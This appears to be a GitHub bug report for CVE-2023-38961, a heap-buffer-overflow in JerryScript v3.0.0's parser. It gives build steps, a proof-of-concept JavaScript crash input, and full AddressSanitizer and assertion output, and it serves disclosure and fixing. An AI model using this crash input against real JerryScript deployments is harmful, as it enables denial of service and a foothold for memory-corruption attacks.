Headline
CVE-2023-38961: heap-buffer-overflow in scanner_is_context_needed · Issue #5092 · jerryscript-project/jerryscript
Buffer Overflwo vulnerability in JerryScript Project jerryscript v.3.0.0 allows a remote attacker to execute arbitrary code via the scanner_is_context_needed component in js-scanner-until.c.
JerryScript revision
Commit: 05dbbd1
Version: v3.0.0
Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
Build steps
python ./tools/build.py --clean --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
Test casetestcase
async function n() {
return 1 ;
}
import {
nFromEvent as’’throw n ( ) undefined }
1
}
async function from async 1; }
async function a() {
var n = await 2 ;
return n ;
}
import { n };
return n;
}
var r = async function() {
var n = await 2; return n;
};
// poc.js import { nFromEvent as ‘’ }
Execution steps & Output
$ ./jerryscript/build/bin/jerry poc.js
=================================================================
==1326574==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf510071e at pc 0x56641307 bp 0xffa4ba68 sp 0xffa4ba58
READ of size 1 at 0xf510071e thread T0
#0 0x56641306 in scanner_is_context_needed ./jerryscript/jerry-core/parser/js/js-scanner-util.c:2101
#1 0x56639a78 in parser_parse_source ./jerryscript/jerry-core/parser/js/js-parser.c:2267
#2 0x565cc3cf in jerry_parse_common ./jerryscript/jerry-core/api/jerryscript.c:412
#3 0x565cc631 in jerry_parse ./jerryscript/jerry-core/api/jerryscript.c:480
#4 0x566c1644 in jerryx_source_parse_script ./jerryscript/jerry-ext/util/sources.c:52
#5 0x566c1701 in jerryx_source_exec_script ./jerryscript/jerry-ext/util/sources.c:63
#6 0x565c4d04 in main ./jerryscript/jerry-main/main-desktop.c:156
#7 0xf769fed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
#8 0x565c7fb4 in _start (./jerryscript/build/bin/jerry+0x12fb4)
0xf510071e is located 0 bytes to the right of 14-byte region [0xf5100710,0xf510071e)
allocated by thread T0 here:
#0 0xf7a88817 in __interceptor_malloc ../../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
#1 0x565c7ae4 in jmem_heap_alloc ./jerryscript/jerry-core/jmem/jmem-heap.c:254
#2 0x5662cd8d in jmem_heap_gc_and_alloc_block ./jerryscript/jerry-core/jmem/jmem-heap.c:291
#3 0x5663d2bd in scanner_malloc ./jerryscript/jerry-core/parser/js/js-scanner-util.c:93
#4 0x5663d33d in scanner_insert_info ./jerryscript/jerry-core/parser/js/js-scanner-util.c:183
#5 0x5663f35b in scanner_pop_literal_pool ./jerryscript/jerry-core/parser/js/js-scanner-util.c:949
#6 0x5664e18f in scanner_scan_all ./jerryscript/jerry-core/parser/js/js-scanner.c:3366
#7 0x5663913b in parser_parse_source ./jerryscript/jerry-core/parser/js/js-parser.c:2167
#8 0x565cc3cf in jerry_parse_common ./jerryscript/jerry-core/api/jerryscript.c:412
#9 0x565cc631 in jerry_parse ./jerryscript/jerry-core/api/jerryscript.c:480
#10 0x566c1644 in jerryx_source_parse_script ./jerryscript/jerry-ext/util/sources.c:52
#11 0x566c1701 in jerryx_source_exec_script ./jerryscript/jerry-ext/util/sources.c:63
#12 0x565c4d04 in main ./jerryscript/jerry-main/main-desktop.c:156
#13 0xf769fed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
SUMMARY: AddressSanitizer: heap-buffer-overflow ./jerryscript/jerry-core/parser/js/js-scanner-util.c:2101 in scanner_is_context_needed
Shadow bytes around the buggy address:
0x3ea20090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea200a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea200b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea200c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea200d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa 00 04
=>0x3ea200e0: fa fa 00[06]fa fa 00 07 fa fa 00 06 fa fa 00 03
0x3ea200f0: fa fa 00 07 fa fa 00 00 fa fa fa fa fa fa fa fa
0x3ea20100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea20110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea20120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea20130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==1326574==ABORTING
with debugging mode(–debug)
Outputs
ICE: Assertion 'type == SCANNER_STREAM_TYPE_VAR || type == SCANNER_STREAM_TYPE_LET || type == SCANNER_STREAM_TYPE_CONST || type == SCANNER_STREAM_TYPE_FUNC || is_import' failed at ./jerryscript/jerry-core/parser/js/js-scanner-util.c(scanner_is_context_needed):2080.
Error: JERRY_FATAL_FAILED_ASSERTION
Aborted
Credits: @Ye0nny, @EJueon of the seclab-yonsei.